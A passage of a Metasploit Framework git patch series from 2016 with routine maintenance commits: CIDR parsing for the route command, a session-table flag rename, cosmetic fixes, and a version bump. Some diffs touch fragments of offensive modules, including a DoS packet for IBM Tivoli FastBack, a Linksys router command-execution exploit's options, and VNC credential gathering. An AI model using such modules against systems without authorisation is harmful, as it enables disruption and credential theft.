Comm, use it. - if (Rex::Socket::Comm.const_defined?(args[2])) - gw = Rex::Socket::Comm.const_get(args[2]) + case gateway_name + when /local/i + gateway = Rex::Socket::Comm::Local + when /^[0-9]+$/ + session = framework.sessions.get(gateway_name) + if session.kind_of?(Msf::Session::Comm) + gateway = session + elsif session.nil? + print_error("Not a session: #{gateway_name}") + return false + else + print_error("Cannout route through specified session (not a Comm)") + return false end - rescue NameError - end - - # If we still don't have a gateway, check if it's a session. - if ((gw == nil) and - (session = framework.sessions.get(args[2])) and - (session.kind_of?(Msf::Session::Comm))) - gw = session - elsif (gw == nil) - print_error("Invalid gateway specified.") + else + print_error("Invalid gateway") return false end - if arg == "remove" or arg == "del" - worked = Rex::Socket::SwitchBoard.remove_route(args[0], args[1], gw) - if worked - print_status("Route removed") - else - print_error("Route not found") - end + msg = "Route " + if action == "remove" or action == "del" + worked = Rex::Socket::SwitchBoard.remove_route(args[0], args[1], gateway) + msg << worked ? "removed" : "not found" else - worked = Rex::Socket::SwitchBoard.add_route(args[0], args[1], gw) - if worked - print_status("Route added") - else - print_error("Route already exists") - end + worked = Rex::Socket::SwitchBoard.add_route(args[0], args[1], gateway) + msg << worked ? "added" : "already exists" end + print_status(msg) when "get" if (args.length == 0) From 28e6d8ef9e99b6879d1d19c4b75ac36cbc4f7166 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Wed, 17 Feb 2016 09:44:32 -0600 Subject: [PATCH 64/71] Allow CIDR notation for the route command --- lib/msf/ui/console/command_dispatcher/core.rb | 34 +++++++++---------- 1 file changed, 16 insertions(+), 18 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index a6165c2bbb..cf11b92dd7 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1310,24 +1310,22 @@ class Core case action when "add", "remove", "del" - if (args.length < 3) + subnet = args.shift + subnet,cidr_mask = subnet.split("/") + + if cidr_mask + netmask = Rex::Socket.addr_ctoa(cidr_mask.to_i) + else + netmask = args.shift + end + + gateway_name = args.shift + + if (subnet.nil? || netmask.nil? || gateway_name.nil?) print_error("Missing arguments to route #{action}.") return false end - # Satisfy check to see that formatting is correct - unless Rex::Socket::RangeWalker.new(args[0]).length == 1 - print_error "Invalid IP Address" - return false - end - - unless Rex::Socket::RangeWalker.new(args[1]).length == 1 - print_error "Invalid Subnet mask" - return false - end - - gateway_name = args.pop - gateway = nil case gateway_name @@ -1351,11 +1349,11 @@ class Core msg = "Route " if action == "remove" or action == "del" - worked = Rex::Socket::SwitchBoard.remove_route(args[0], args[1], gateway) - msg << worked ? "removed" : "not found" + worked = Rex::Socket::SwitchBoard.remove_route(subnet, netmask, gateway) + msg << (worked ? "removed" : "not found") else - worked = Rex::Socket::SwitchBoard.add_route(args[0], args[1], gateway) - msg << worked ? "added" : "already exists" + worked = Rex::Socket::SwitchBoard.add_route(subnet, netmask, gateway) + msg << (worked ? "added" : "already exists") end print_status(msg) From adb175136e99a61f2011d2a411f6900620e9ed86 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 18 Feb 2016 15:14:35 -0600 Subject: [PATCH 65/71] Fix extra whitespace and unused vars in call --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index f04adddfdf..2a7d55a2ea 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -12,7 +12,7 @@ class Metasploit4 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => " Server Opcode 0x534 Denial of Service", + 'Name' => "Server Opcode 0x534 Denial of Service", 'Description' => %q{ This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server when dealing with packets triggering the opcode 0x534 handler. @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary print_status("Sending malicious packet") p = tv_pkt(target_opcode, - p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0], - p2 = Rex::Text.rand_text_alpha(0x60), - p3 = Rex::Text.rand_text_alpha(0x60) + "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0], + Rex::Text.rand_text_alpha(0x60), + Rex::Text.rand_text_alpha(0x60) ) sock.put(p) From d316609fef3ef1ec68450a275bd78d87ae4c36dc Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Thu, 18 Feb 2016 15:36:43 -0600 Subject: [PATCH 66/71] put extra columns under the -x flag --- lib/msf/base/serializer/readable_text.rb | 6 +++--- lib/msf/ui/console/command_dispatcher/core.rb | 12 ++++++------ 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index b93cd55bc0..ae2cca777a 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -524,7 +524,7 @@ class ReadableText def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false - show_checkin = opts[:show_checkin] || false + show_extended = opts[:show_extended] || false indent = opts[:indent] || DefaultIndent col = opts[:col] || DefaultColumnWrap @@ -533,7 +533,7 @@ class ReadableText columns = [] columns << 'Id' columns << 'Type' - columns << 'Checkin?' if show_checkin + columns << 'Checkin?' if show_extended columns << 'Information' columns << 'Connection' @@ -556,7 +556,7 @@ class ReadableText row << session.type.to_s row[-1] << (" " + session.platform) if session.respond_to?(:platform) - if show_checkin + if show_extended if session.respond_to?(:last_checkin) && session.last_checkin row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago" else diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index d5080f9f40..da0ee05517 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -35,7 +35,6 @@ class Core # Session command options @@sessions_opts = Rex::Parser::Arguments.new( "-c" => [ true, "Run a command on the session given with -i, or all" ], - "-ci" => [ false, "Show the last checkin time in the session table" ], "-h" => [ false, "Help banner" ], "-i" => [ true, "Interact with the supplied session ID " ], "-l" => [ false, "List all active sessions" ], @@ -46,7 +45,8 @@ class Core "-s" => [ true, "Run a script on the session given with -i, or all" ], "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ], "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], - "-t" => [ true, "Set a response timeout (default: 15)" ]) + "-t" => [ true, "Set a response timeout (default: 15)" ], + "-x" => [ false, "Show extended information in the session table" ]) @@jobs_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ], @@ -1760,7 +1760,7 @@ class Core begin method = nil quiet = false - show_checkin = false + show_extended = false verbose = false sid = nil cmds = [] @@ -1781,8 +1781,8 @@ class Core when "-c" method = 'cmd' cmds << val if val - when "-ci" - show_checkin = true + when "-x" + show_extended = true when "-v" verbose = true # Do something with the supplied session identifier instead of @@ -2045,7 +2045,7 @@ class Core end when 'list',nil print_line - print(Serializer::ReadableText.dump_sessions(framework, :show_checkin => show_checkin, :verbose => verbose)) + print(Serializer::ReadableText.dump_sessions(framework, :show_extended => show_extended, :verbose => verbose)) print_line end From a82ce40c401c54e45acdd24364ec6162deefa841 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 17 Feb 2016 14:33:35 -0600 Subject: [PATCH 67/71] Update ibm_tsm_dos name For some reason I actually modified the name, but I didn't mean to. --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 2a7d55a2ea..d04a70f6a0 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -12,7 +12,7 @@ class Metasploit4 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => "Server Opcode 0x534 Denial of Service", + 'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", 'Description' => %q{ This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server when dealing with packets triggering the opcode 0x534 handler. From 3b9502cb1d6817992666f025b8ca4cd68c33ffb7 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Thu, 18 Feb 2016 18:45:04 -0600 Subject: [PATCH 68/71] Don't require username in wrt110 module. --- modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb index c8d41f7060..07ef38cb19 100644 --- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote )) register_options([ - OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), + OptString.new('USERNAME', [ false, 'Valid router administrator username', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) From b58166a9a84f1bbb045c2dccd43472ab57722012 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Thu, 18 Feb 2016 20:13:39 -0600 Subject: [PATCH 69/71] add android platform to the hash --- modules/post/multi/manage/play_youtube.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index 3d44dba25c..b4b18d615c 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], - 'Platform' => [ 'win', 'osx', 'linux' ], + 'Platform' => [ 'win', 'osx', 'linux', 'android' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) From bfd204ac502015450583cdb749b64b0d4b6ffd59 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Fri, 19 Feb 2016 15:00:56 -0600 Subject: [PATCH 70/71] Fix some cosmetic issues --- modules/post/windows/gather/credentials/vnc.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 040a6a436c..0442f20835 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Post #check uninstall key begin root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Ultravnc2_is1") - open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ) + open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) vnclocation = open_key.query_value("InstallLocation").data locations << {:name => 'UltraVNC', - :check_file => vnclocation + "\\ultravnc.ini", - :pass_variable => 'passwd=', - :viewonly_variable => 'passwd2=', - :port_variable => 'PortNumber='} + :check_file => vnclocation + "\\ultravnc.ini", + :pass_variable => 'passwd=', + :viewonly_variable => 'passwd2=', + :port_variable => 'PortNumber='} rescue Rex::Post::Meterpreter::RequestError => e vprint_error(e.message) end From b868f7cc89bee907e3c3e007947b65aadde105a0 Mon Sep 17 00:00:00 2001 From: Metasploit <metasploit@rapid7.com> Date: Fri, 19 Feb 2016 20:19:43 -0800 Subject: [PATCH 71/71] Bump version of framework to 4.11.12 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 4cf7c7588b..c0937476b4 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.11) + metasploit-framework (4.11.12) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index a5241a7344..76417d3584 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.11" + VERSION = "4.11.12" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash